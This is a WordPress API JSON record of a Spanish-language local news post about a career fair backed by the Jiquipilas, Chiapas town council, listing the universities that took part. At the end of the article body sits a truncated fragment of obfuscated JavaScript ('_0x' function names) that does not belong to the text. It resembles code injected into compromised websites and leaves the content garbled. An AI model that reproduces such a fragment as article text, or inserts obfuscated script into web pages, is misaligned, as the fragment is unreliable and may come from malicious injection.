{"id":1042,"date":"2022-04-04T07:06:41","date_gmt":"2022-04-04T07:06:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1042"},"modified":"2022-04-04T07:06:42","modified_gmt":"2022-04-04T07:06:42","slug":"respalda-ayuntamiento-de-jiquipilas-feria-profesiografica-en-el-municipio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1042","title":{"rendered":"Respalda Ayuntamiento de Jiquipilas feria profesiogr\u00e1fica en el municipio"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"1044\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.35-PM-1024x681.jpeg\" alt=\"\" class=\"wp-image-1044\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.35-PM-1024x681.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.35-PM-300x199.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.35-PM-768x511.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.35-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.35-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"1043\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.33-PM-1024x681.jpeg\" alt=\"\" class=\"wp-image-1043\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.33-PM-1024x681.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.33-PM-300x199.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.33-PM-768x511.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.33-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-03-at-8.29.33-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u2022 Informar ofertas educativas para la continuaci\u00f3n de estudios superiores.<\/p>\n\n\n\n<p>3 de abril del 2022. Jiquipilas, Chiapas.- Con el prop\u00f3sito de exponer la oferta acad\u00e9mica, modalidades, ubicaci\u00f3n, instalaciones y ayudar al proceso de selecci\u00f3n para preparar profesionales, el Ayuntamiento de Jiquipilas respald\u00f3 la feria profesiogr\u00e1fica, coordinada con la Preparatoria Agropecuaria Jiquipilas.<\/p>\n\n\n\n<p>Durante la expo se expusieron las ofertas educativas a nivel Superior para que el alumnado pr\u00f3ximo a egresar cuenten con la informaci\u00f3n de las carreras que se ofertan, para continuar su desarrollo profesional y estudiar licenciaturas o ingenieras de su inter\u00e9s.<\/p>\n\n\n\n<p>El alcalde mencion\u00f3 que se siente satisfecho de atestiguar e inter\u00e9s de las y los j\u00f3venes para poder continuar sus estudios y lograr el anhelado sue\u00f1o de convertirse en profesionistas, aportado conocimiento y experiencia en diferentes sectores, gracias a la preparaci\u00f3n y superaci\u00f3n adquirida.<\/p>\n\n\n\n<p>\u201cSabemos la importancia que tiene&nbsp;elegir la carrera&nbsp;y el&nbsp;plantel educativo&nbsp;para continuar con su preparaci\u00f3n profesional, en eso radica la importancia de eventos como este, para que las y los estudiantes tengan&nbsp;acceso de primera mano&nbsp;a la informaci\u00f3n y tomen esta decisi\u00f3n trascendental en su vida estudiantil y desarrollo profesional\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<p>Las universidades que estuvieron presebtes haciendo la promoci\u00f3n de las casas de estudios son: Universidad Salazar (IESCH) plantel Cintalapa, Universidad (INFA) plantel Tuxtla Guti\u00e9rrez, Instituto Tecnol\u00f3gico Superior de Cintalapa, Universidad Cristiana de Chiapas, Sistema Educativo Universitario Azteca (SEUAT), Universidad Aut\u00f3noma Agraria Antonio Narro sede Cintalapa, Universidad polit\u00e9cnica de Chiapas en (Suchiapa), Universidad del Valle de M\u00e9xico Tuxtla Guti\u00e9rrez, Instituto Latinoam\u00e9ricano de estudios profesionales de Chiapas sede Jiquipilas, Unicach Lic. en biolog\u00eda Marina sede Tonal\u00e1 Chiapas y Universidad (UC) de Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Informar ofertas educativas para la continuaci\u00f3n de estudios superiores. 3 de abril del 2022. Jiquipilas, Chiapas.- Con el prop\u00f3sito de exponer la oferta acad\u00e9mica, modalidades, ubicaci\u00f3n, instalaciones y ayudar al proceso de selecci\u00f3n para preparar profesionales, el Ayuntamiento de Jiquipilas respald\u00f3 la feria profesiogr\u00e1fica, coordinada con la Preparatoria Agropecuaria Jiquipilas. Durante la expo se &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1043,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1042","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1042","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1042"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1042\/revisions"}],"predecessor-version":[{"id":1045,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1042\/revisions\/1045"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1043"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1042"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1042"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1042"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}